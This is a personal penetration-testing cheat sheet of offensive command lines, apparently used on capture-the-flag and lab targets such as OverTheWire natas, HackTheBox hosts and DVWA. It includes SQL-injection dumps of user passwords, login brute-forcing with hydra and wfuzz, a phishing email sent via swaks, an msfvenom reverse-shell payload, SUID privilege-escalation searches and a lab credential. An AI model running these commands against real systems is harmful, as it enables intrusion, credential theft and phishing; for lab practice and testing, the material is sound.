Pentest Notes
Most common usage of tools
sqlmap
- sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
- sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php?debug" --string="This user exists" --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data "username=natas16" --level=5 --risk=3 -D natas15 -T users -C username,password --dump --dbms mysql -v 3
Fast fuzzing of subdomains with ffuf
- ./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185 (-fs filters out responses of the given size in bytes)
- ./ffuf -u "/FUZZ" -w seclist -c -r -v
- ./ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u "http://34.74.105.127/858d868c45/login" -X POST -d "username=FUZZ&password=FUZZ" -fw 16
Swaks: Swiss Army Knife for SMTP
- swaks -to $mail -from it@sneakymailer.htb -header "Subject:Credentials/Errors" -body "goto:http://10.10.14.131/" -server 10.10.10.197
Nikto
- Test all files with all root directories
- nikto -url "http://10.10.84.250/login.php" -mutate 1
- Host Authentication
- nikto -url -id admin:PrettyAwesomePassword1234
Hydra
- Hydra to bruteforce post request
- hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"
wfuzz
- wfuzz to bruteforce POST request
- wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=FUZZ" -u "http://10.10.112.42/users/login.php" --hl 64
- wfuzz subdomain fuzzing
- wfuzz -c -f subdomain.txt -w wordlist -u "" -H "Host: FUZZ.hostname.com" --hl 108 (-f writes results to subdomain.txt; the keyword must be FUZZ in upper case)
msfvenom
- msfvenom -p windows/shell/reverse_tcp lhost= lport= -f exe --platform x86 > reverse.exe
Samba
- smbclient //10.10.10.12/Foldername -U username%pass
- Recursive listing: smbmap -H 10.10.10.* -R
- Downloading files recursively
- mask ""
- recurse ON
- prompt OFF
- mget *
- Mount smb shares
- sudo mount -t cifs /// /mnt/foldername -o "username=,password="
LDAP
- ldapsearch -x -h 10.10.10.193 -b 'dc=whatev,dc=whatev.local'
- ldapsearch -x -h 10.10.10.193 -s base namingcontexts
Crack Map Exec
- Check the password policy (lockout threshold) before bruteforcing
- crackmapexec smb 10.10.10.* --pass-pol -M spider_plus
- Now bruteforce
- crackmapexec winrm -u "username" -p pass.txt -X "whoami /all"
RPC CLIENT
- rpcclient -U "" -N 10.10.10.* (null session, -N skips the password prompt)
- enumdomusers
- lookupnames administrator
- querydispinfo
Windows
- powershell -c "Invoke-WebRequest https://path/to/file.txt -OutFile C:\file.txt"
- whoami /priv
- Files of interest
- Windows/windowsupdate.log , system32/license.rtf
- evil-winrm -i <ip> -u username -p password
BASH
- netstat -tulpn
- gobuster vhost -u target.domain -w wordlist -o output.txt
- tcpdump -i tun0 icmp
- Find SUID files
- find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
- find / -perm -u=s -type f 2>/dev/null
- iconv -t UTF-16LE
- Hashcat to generate custom wordlist from keyphrases:
- hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule keyphrases.txt > wordlist_made.txt